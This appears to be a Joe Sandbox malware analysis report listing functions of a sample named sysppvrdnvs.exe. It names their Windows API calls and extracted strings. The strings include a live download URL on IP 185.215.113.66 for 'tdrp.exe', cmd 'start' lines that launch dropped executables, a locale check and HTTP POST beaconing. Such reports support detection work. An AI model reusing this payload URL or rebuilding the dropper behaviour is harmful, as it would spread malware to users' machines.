                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                                      • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$C:\Windows\sysppvrdnvs.exe$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                                      • API String ID: 495142193-2225385857
                                                                                                                                                                                                      • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                                                                                      Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                                      • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                      • API String ID: 92872011-445461498
                                                                                                                                                                                                      • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                                      Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocalestrcmp
                                                                                                                                                                                                      • String ID: UKR
                                                                                                                                                                                                      • API String ID: 3191669094-64918367
                                                                                                                                                                                                      • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                                                                                      Function 004064A0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 111networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                                      • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                                      • %temp%, xrefs: 004064CB
                                                                                                                                                                                                      • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                                      • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                                      • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                                      • .Wu, xrefs: 004065F2, 0040662D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.Wu
                                                                                                                                                                                                      • API String ID: 2816847299-3679779081
                                                                                                                                                                                                      • Opcode ID: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                                                                                      • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                                      • Opcode Fuzzy Hash: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                                                                                      Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                      • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                      • String ID: PCOI$ilci
                                                                                                                                                                                                      • API String ID: 3345448188-3762367603
                                                                                                                                                                                                      • Opcode ID: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                                                                                      • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                                                                                      Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                                      • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                      • API String ID: 2761394606-2217117414
                                                                                                                                                                                                      • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                                                                                      Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                      • String ID: PCOI$ilci$.Wu
                                                                                                                                                                                                      • API String ID: 2403999931-3309795540
                                                                                                                                                                                                      • Opcode ID: efb049a2581240a5a3752b10eb22395ee38dfd009db395b337f3383873aa31ff
                                                                                                                                                                                                      • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: efb049a2581240a5a3752b10eb22395ee38dfd009db395b337f3383873aa31ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                                                                                      Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040E668
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$GET
                                                                                                                                                                                                      • API String ID: 1205665004-427699995
                                                                                                                                                                                                      • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                                      Function 004060A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 176fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                                      • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                                      • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                      • String ID: C:\Users\user\tbtcmds.dat$.Wu
                                                                                                                                                                                                      • API String ID: 1457358591-382727166
                                                                                                                                                                                                      • Opcode ID: acef95171fe914400af161e3ad861a3f1311d831e466546ea9f77ab4e276f608
                                                                                                                                                                                                      • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                                      • Opcode Fuzzy Hash: acef95171fe914400af161e3ad861a3f1311d831e466546ea9f77ab4e276f608
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                                      Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                                      • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                                      • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                                      • cl@, xrefs: 004066A0
                                                                                                                                                                                                      • %comspec%, xrefs: 004066EE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                                      • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                                      • API String ID: 1147330536-497122036
                                                                                                                                                                                                      • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                                      Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
